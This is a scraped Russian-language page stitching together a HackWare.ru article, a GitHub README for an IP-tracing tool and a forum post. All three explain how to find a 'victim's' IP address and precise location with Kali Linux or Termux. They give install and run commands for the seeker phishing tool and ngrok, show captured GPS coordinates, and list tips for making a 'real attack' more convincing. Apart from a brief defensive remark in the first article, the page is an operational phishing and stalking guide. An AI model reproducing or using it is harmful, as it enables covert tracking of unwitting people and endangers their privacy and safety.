Узнать ip жертвы kali linux

HackWare.ru

Этичный хакинг и тестирование на проникновение, информационная безопасность

Как узнать точное расположение пользователя

Как узнать где находится человек

В этой статье будет показано, как с помощью социальной инженерии узнать точное (до дома) расположение пользователя. Это будет важно и тем, кто хочет защититься от подобных атак — вы увидите, чего категорически нельзя делать на ненадёжных сайтах и узнаете, какую информацию о вас может получить лицо, приславшее вам ссылку.

Описанная атака сработает, если пользователь откроет нашу ссылку с мобильного телефона (для точного определения расположения нужен GPS на устройстве «жертвы») и разрешит сайту использовать расположение пользователя. Независимо от того, включён ли GPS, при открытии пользователем ссылки мы получим следующую информацию:

  • Операционная система
  • Платформа
  • Количество ядер процессора
  • Объем оперативной памяти — приблизительные результаты
  • Разрешение экрана
  • Информация о GPU
  • Имя и версия браузера
  • Публичный IP-адрес

Если будут получено разрешение на доступ к расположению, мы можем получить:

  • долготу
  • широту
  • точность
  • высоту над уровнем моря — не всегда доступна
  • направление — доступно только если пользователь движется
  • скорость — доступно только если пользователь движется

Алгоритм действий очень простой:

  1. Мы запускаем фишинговый сайт, который под предлогом, например, поиска новых знакомств рядом запрашивает разрешение на определение расположения пользователя.
  2. Отправляем пользователю ссылку на наш сайт.
  3. Если пользователь даёт разрешение сайту на получение его местоположения, то мы узнаём с точностью до десятков метров, где он сейчас находится.
  4. Даже если пользователь не даёт разрешения, но кликает ссылку, то мы узнаём его IP адрес, модель веб-браузера и некоторые другие характеристики его телефона или компьютера.

Программы для поиска расположения пользователя

Нам понадобятся две программы:

  • seeker — запускает фишинговый сайт и анализирует полученные данные.
  • ngrok — на тот случай, если у вас нет белого IP адреса (или хостинга); эта программа позволяет создавать ссылки на ваш сайт, благодаря чему сайт на вашем локальном компьютере можно открыть в Интернете. Больше подробностей об этой программе вы найдёте в статье «Как без белого IP локальный веб-сервер сделать доступным из Интернета».
Читайте также:  Linux tar unzip tar gz

Я покажу пример атаки из Kali Linux, если у вас другой дистрибутив, то инструкции по установке смотрите по ссылкам выше в карточках этих программ.

Установка seeker в Kali Linux

sudo apt update sudo apt install python3 python3-pip php ssh git pip3 install requests git clone https://github.com/thewhiteh4t/seeker cd seeker/ python3 ./seeker.py -h

Установка ngrok в Kali Linux

wget `curl -s https://ngrok.com/download | grep -o -E 'https://bin.equinox.io/c/[A-Za-z0-9]/ngrok-stable-linux-amd64.zip'` unzip ngrok-stable-linux-amd64.zip chmod +x ./ngrok ./ngrok -h

Инструкция по использованию seeker

Далее всё очень просто, запускаем seeker:

python3 ./seeker.py -t manual

Примечание: если при попытке запуска встроенного PHP сервера у вас возникли проблемы, то посмотрите содержимое файла ./logs/php.log. Если там вы найдёте ошибки с упоминанием open_basedir, то смотрите статью «Ошибка «Warning: Unknown: open_basedir restriction in effect.» (РЕШЕНО)».

На выбор присутствует два готовых шаблона:

[+] Select a Template : [1] NearYou [2] Google Drive

Затем выводится информация:

[+] Starting PHP Server. [ Success ] [+] Waiting for User Interaction.

В ней сказано, что PHP сервер успешно запущен и ожидается взаимодействие с пользователем.

Теперь для создания тоннеля из Интернета до нашего локального сервера, в другом окне запускаем ngrok:

Сгенерирована ссылка https://1fa595b3.ngrok.io. Её нужно отправить «жертве». Предположим, пользователь открыл ссылку на настольном компьютере. В этом случае он увидит:

Страница выглядит очень профессионально, красивая анимация. Надписи говорят о том, что этот сервис позволяет найти людей рядом с вами и завести новых друзей. Предположим, пользователь нажал кнопку «Continue»:

Возникает запрос на доступ к местоположению.

В окне seeker мы видим следующее:

Мы узнали IP и User Agent пользователя, но данные о местоположении не получены, просто потому, что у компьютера нет GPS модуля:

[-] Location information is unavailable

Откроем теперь фишинговую ссылку на мобильном телефоне.

Запрос данных о местоположении:

В этот раз получены данные локации:

[+] Location Information : [+] Latitude : 12.458610728197513 deg [+] Longitude : 99.97342079401619 deg [+] Accuracy : 3.4233226776123047 m [+] Altitude : 65.55902099609375 [+] Direction : Not Available [+] Speed : 0.23704902827739716 m/s

Также сказано, что данные сохранены в файл по пути ./seeker/db/results.csv (относительно папки с файлами seeker). В этом файле хранятся все данные, в том числе с предыдущих атак.

Читайте также:  Linux archive file command

Что можно улучшить для реальной атаки

Несмотря на полную реализацию и упаковку в удобную и простую программу, это скорее инструменты для демонстрации рабочего концепта атаки, чем для реальной атаки.

При выполнении реальной атаки можно сделать следующие улучшения:

  • перевести шаблоны фишинговых сайтов на язык целевого пользователя
  • создать свои собственные шаблоны
  • использовать сократитель ссылок
  • использовать подходящий для легенды домен или субдомен
  • если продолжать использовать ngrok, то хотя бы переместить шаблоны в подпапку, чтобы в ссылке присутствовал подходящий по ситуации путь
  • усовершенствовать алгоритм: если данные местоположения не получены, то написать пользователю рекомендацию открыть ссылку с телефона
  • записывать все случаи, когда ссылка была открыта, даже если пользователь не нажал кнопку (можно узнать хотя бы IP адрес пользователя)

Связанные статьи:

Источник

Saved searches

Use saved searches to filter your results more quickly

You signed in with another tab or window. Reload to refresh your session. You signed out in another tab or window. Reload to refresh your session. You switched accounts on another tab or window. Reload to refresh your session.

How to check someone’s IP Address using Kali Linux

License

RaghavDabra/IP-Tracer-Tracker-using-Kali-Linux-

This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

Sign In Required

Please sign in to use Codespaces.

Launching GitHub Desktop

If nothing happens, download GitHub Desktop and try again.

Launching GitHub Desktop

If nothing happens, download GitHub Desktop and try again.

Launching Xcode

If nothing happens, download Xcode and try again.

Launching Visual Studio Code

Your codespace will open once ready.

There was a problem preparing your codespace, please try again.

Latest commit

Git stats

Files

Failed to load latest commit information.

README.md

 (_/-------------_______________________) `| /~~~~~~~~~~\ | IP TRACER MODIFIED VERSION ; |--------(-||______________________| ; |--------(-| ____________| ; \__________/' _/__ ___; 
  • trace -m to track your own ip address.
  • trace -t target-ip to track other’s ip address for example `ip-tracer -t 203.176.55.72
  • trace for more information.
  • 121.92.205.246
  • 32.195.19.37
  • 66.24.169.193
  • 73.179.90.56
  • 202.249.122.168
  • 106.206.150.202
  • 207.104.148.106
  • 207.44.229.231
  • apt update
  • apt install git -y
  • https://github.com/RaghavDabra/IP-Tracer-Tracker-using-Kali-Linux-.git
  • cd IP-Tracer
  • chmod +x install
  • sh install or ./install
Читайте также:  Linux найти файлы больше 1гб

About

How to check someone’s IP Address using Kali Linux

Источник

Kali Linux & Termux] — как вычислить человека по ip с точностью до ~30 метров

Для Kali Linux:

[1.] — Заходим в ОС Kali Linux
[2.] — Запускаем «Terminal» // «Терминал»
[3.] — Пишем все команды по очерёдности написанные ниже
[4.] — После этого у вас появится текст в котором есть ссылка, которую надо кидать (см ниже подробности которые надо прочитать)

Код:

apt update
apt upgrade
apt install git
cd Desktop
git clone https://github.com/thewhiteh4t/seeker.git
cd seeker
chmod 777 install.sh
./install.sh
./seeker.py

После этого появится строка с ссылкой при переходе на неё в терминал (консоль) будет приходить надпись о данных жертвы (Какая стоит ОС у жертвы // какое разрешение экрана жертвы // с какого браузера открыла жертва // город // страна // IP-адрес жертвы) // если нажать на кнопку «Search» и согласиться с включением гео.локацией вам придут точные данные до ~30 метров. (Какая стоит ОС у жертвы // какое разрешение экрана жертвы // с какого браузера открыла жертва // город IP адреса // страна IP адреса // IP-адрес жертвы // координаты жертвы и карта Google // [все точные данные у жертве])

1.] — Скачиваем приложение Termux в Play Store (Play Маркет) [Android]
[2.] — запускаем
[3.] — Пишем все команды по очерёдности написанные ниже
[4.] — После этого у вас появится текст в котором есть ссылка, которую надо кидать (см ниже подробности которые надо прочитать)

Код:

apt update
apt upgrade
apt install git
git clone https://github.com/thewhiteh4t/seeker.git
cd seeker
chmod 777 termux_install.sh
./termux_install.sh
./seeker.py

После этого появится строка с ссылкой при переходе на неё в терминал (консоль) будет приходить надпись о данных жертвы (Какая стоит ОС у жертвы // какое разрешение экрана жертвы // с какого браузера открыла жертва // город // страна // IP-адрес жертвы) // если нажать на кнопку «Search» и согласиться с включением гео.локацией вам придут точные данные до ~30 метров. (Какая стоит ОС у жертвы // какое разрешение экрана жертвы // с какого браузера открыла жертва // город IP адреса // страна IP адреса // IP-адрес жертвы // координаты жертвы и карта Google // [все точные данные у жертве])

Источник

Оцените статью
Adblock
detector